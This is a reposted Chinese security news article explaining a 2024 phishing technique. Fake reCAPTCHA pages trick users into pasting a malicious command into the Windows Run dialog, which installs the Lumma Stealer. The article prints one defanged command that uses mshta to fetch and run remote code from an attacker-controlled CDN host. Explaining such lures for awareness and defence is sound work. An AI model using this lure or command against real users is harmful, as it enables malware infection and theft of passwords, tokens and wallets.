脑洞大开的【新型】钓鱼方法 reCAPTCHA 【网络钓鱼】

admin 2024年9月25日09:49:57评论19 views字数 2017阅读6分43秒阅读模式

安小圈

第510期

网络钓鱼  reCAPTCHA 

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

reCAPTCHA 网络钓鱼是在2024 年 8 -9 月在野发现的一种新型钓鱼方式,本文用以描述和演示此钓鱼方式。

最初看到的是“验证你是人类”的弹窗,这和以往没什么不同,但是此次的钓鱼也是借助了人们对此行为的习惯,通过让使用者复制粘贴payload从而实现攻击。
它实际上指示用户使用热键Win+R打开 Windows 运行对话框,并让他们使用Ctrl+V Web 浏览器已预先复制到剪贴板中的恶意命令。
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

虽然,看起来有点过于简单直接,但是其却出奇的有效...

截至 2024 年 8 月下旬,攻击者一直在使用欺诈性的“人工验证”页面来诱骗用户执行恶意 PowerShell 脚本。Lumma Stealer 旨在从受感染的计算机中窃取敏感信息,例如密码、会话令牌、加密货币钱包和其他个人数据。

假验证码页面

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

恶意PowerShell脚本的执行

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

PowerShell 脚本获取恶意 PE32 可执行文件(Lumma Stealer),然后在受害者的计算机上运行。

恶意命令执行示例:

mshta hxxps[:]//propller.b-cdn[.]net/propller

web页面js代码

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】
  • 阿里云机房着火超30个小时,云服务宕机,AWS趁火打劫?

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】【原文来源:合规渗透
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】本文内容所包含内容仅限于学习和研究目的。这些内容源自公开的渠道搜集而来,目的是为帮助安全研究人员用于更好地理解和分析潜在的安全问题。
郑重提示:未经授权地利用可能涉及非法活动并导致法律责任和道德问题。请遵循适用的法律法规和道德准则。任何未经授权使用这些内容而导致的后果将由使用者自行承担。本文作者及安小圈不承担因使用本文内容而导致的任何法律问题、损害或责任。请详细阅读并理解这份免责声明。您将被视为已接受并同意遵守本免责声明所有条款和条件。

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

一周回顾
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 行业研究
| 打印机是如何泄露工作秘密的?
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 Windows 漏洞
利用盲文“空格”进行
零日攻击
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 网络安全知识:
什么是工业控制系统 (ICS) 网络安全?
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 高管
需要注意的
网络安全习惯和行为
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 世界最牛【安全架构】SAFE,
它来了!
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 2024 美【黑客】大会
| (black hat usa)全课件分享

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

【自查】
风险突出的30个
| 服务【高危】端口
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 惊心动魄!
Akira 成功勒索100万美元,
全程谈判记录大曝光!
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 网络被黑?
原来是不履行
【网络安全】义务惹的祸
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 PKfail曝光:
一场横扫ATM机、游戏机和企业服务器的安全风暴【风险】
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 定向网络攻击?
供应链攻击?
黎巴嫩【传呼机爆炸】
刷新【网络战】TTP
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 【漏洞预警】
VMware vCenter Server
堆溢出漏洞(CVE-2024-38812)
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 速查!
甲骨文Weblogic服务器
被【黑客】入侵
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 【头条】中秋夜 | 网安一哥【奇安信】全部站点服务宕机
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 我国71个机构受到勒索攻击
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 全球蓝屏后,微软将安全踢出Windows内核
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 提升网络安全技能和意识,应常态化开展的4项网络安全演习
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 Windows 0-Day 漏洞
-(CVSS 9.8)
 CVE-2024-43491
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 阿里云机房着火超30个小时,
云服务宕机,
AWS趁火打劫?

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

《网络安全 (风险评估) 报告》
——样例
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 揭开【社工库】的神秘面纱
| 裸奔的个人隐私
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 中国【APT组织
攻击】国内贸易公司?
| 被控主机或来自【阿里云】!
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 腾讯【微信】存在
可能导致远程代码执行【漏洞】
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 隔离【网络攻击】新高度!
RAMBO攻击
| 利用隔离计算机中的 RAM 窃取数据
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 【黑客】对【网络攻击】的流程
+手法(15类)
| 如何防护 ?
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 黑客通过 PWA 应用
窃取 iOS、Android 用户的
银行凭证
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 【HVV】结束了,
裁员提上日程

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

【HVV】
钓鱼佬思路全放送,拒绝空军!
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 遭遇严重数据泄露后,
该公司宣布投入超6亿元
【升级安全】系统
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 针对中国】公务人员的
大规模【网络钓鱼】活动
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 屏幕之下,危机四伏!
揭秘【公共电子显示屏】背后的
【安全隐患】
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 航空安全系统
曝【严重漏洞】,
黑客可绕过安检进入驾驶舱
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 潜藏系统2个月未被发现
【新型网络攻击】
瞄准中国高价值目标
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 网传【HVV】
第一阶段结束:
常态化保障可以带来哪些改进?
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 新 Webkit 【漏洞】攻击者
|利用 PS4 和 PS5 游戏机:
发起攻击

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

【黑神话 被“黑”!】
|《黑神话:悟空》游戏平台
遭遇DDoS【攻击】:
导致全球多国玩家无法登录

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

【盘点】
十大「亿级」数据泄露
事件:个人信息还安全吗?
脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】 自行车无线变速器
曝出【漏洞】
| 黑客可操纵比赛结果

脑洞大开的【新型】钓鱼方法  reCAPTCHA 【网络钓鱼】

原文始发于微信公众号(安小圈):脑洞大开的【新型】钓鱼方法 -- reCAPTCHA 【网络钓鱼】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月25日09:49:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   脑洞大开的【新型】钓鱼方法 reCAPTCHA 【网络钓鱼】https://cn-sec.com/archives/3205770.html

发表评论

匿名网友 填写信息